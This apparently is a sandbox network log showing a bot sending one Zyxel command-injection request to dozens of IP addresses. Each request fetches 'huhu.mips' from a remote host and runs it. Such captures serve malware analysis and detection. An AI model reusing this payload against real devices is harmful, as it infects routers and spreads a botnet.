                                              Jan 29, 2024 07:04:10.420514107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9551192.168.2.1441312137.189.217.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420541048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9552192.168.2.1450228212.160.144.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420561075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9553192.168.2.1434662199.144.42.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420612097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9554192.168.2.1450596134.173.167.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420644045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9555192.168.2.1457392101.28.91.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420689106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9556192.168.2.145508832.151.145.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420737028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9557192.168.2.144385858.68.155.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420779943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9558192.168.2.1458908177.27.86.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420803070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9559192.168.2.1444160149.142.2.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420835972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9560192.168.2.144824054.170.140.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420867920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9561192.168.2.1452808150.145.5.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420928001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9562192.168.2.1453844198.61.56.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420952082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9563192.168.2.1438128191.160.30.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.420996904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9564192.168.2.1450164222.134.57.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421027899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9565192.168.2.144040234.12.140.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421078920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9566192.168.2.1435752198.70.146.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421111107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9567192.168.2.1456294156.77.250.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421145916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9568192.168.2.1448126100.11.127.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421196938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9569192.168.2.1443166191.152.46.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421219110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9570192.168.2.144565840.214.44.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421268940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9571192.168.2.145568488.22.178.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421299934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9572192.168.2.1441938133.140.203.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421334028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9573192.168.2.145550644.183.49.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421386003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9574192.168.2.1451000197.168.120.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421416044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9575192.168.2.145054093.120.116.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421473026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9576192.168.2.144547050.86.190.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421493053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9577192.168.2.1450920134.26.147.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421554089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9578192.168.2.145010649.21.137.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421593904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9579192.168.2.1452440222.233.28.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.421621084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9580192.168.2.1457056182.151.131.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430260897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9581192.168.2.1450276173.84.93.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430284023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9582192.168.2.1448242212.45.246.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430325985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9583192.168.2.143346812.237.39.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430361032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9584192.168.2.1440188151.168.229.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430422068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9585192.168.2.1442070203.106.35.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430459023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9586192.168.2.14493001.111.99.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430484056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9587192.168.2.1444844205.158.94.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430557013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9588192.168.2.143659896.96.75.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430596113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9589192.168.2.1441166196.154.11.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430649996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9590192.168.2.1433802194.175.242.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430675983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9591192.168.2.143520836.207.138.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430701017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9592192.168.2.144972254.175.5.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430733919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9593192.168.2.1446728221.145.80.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430766106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9594192.168.2.1448232102.15.190.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430788994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9595192.168.2.1447272165.184.60.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430847883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9596192.168.2.1435874178.198.184.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430905104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9597192.168.2.1445136129.67.33.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430923939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9598192.168.2.145794866.136.39.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.430974960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9599192.168.2.1454232116.243.59.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431018114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9600192.168.2.1448340159.80.23.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431051970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9601192.168.2.1449172141.235.49.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431092978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9602192.168.2.1454928176.150.67.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431143045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9603192.168.2.1440358212.171.39.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431190968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9604192.168.2.1455198178.229.150.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431219101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9605192.168.2.144316885.206.83.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431255102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9606192.168.2.1440526116.69.172.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431310892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9607192.168.2.1449302192.242.111.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431372881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9608192.168.2.144878897.205.61.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431408882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9609192.168.2.1458404152.95.200.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431436062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9610192.168.2.1456366203.248.65.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431483030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9611192.168.2.1457504165.221.193.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431509972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9612192.168.2.1459112120.103.28.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431554079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9613192.168.2.145988293.177.239.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431603909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9614192.168.2.1438600185.38.48.188443
                                              TimestampBytes transferredDirectionData
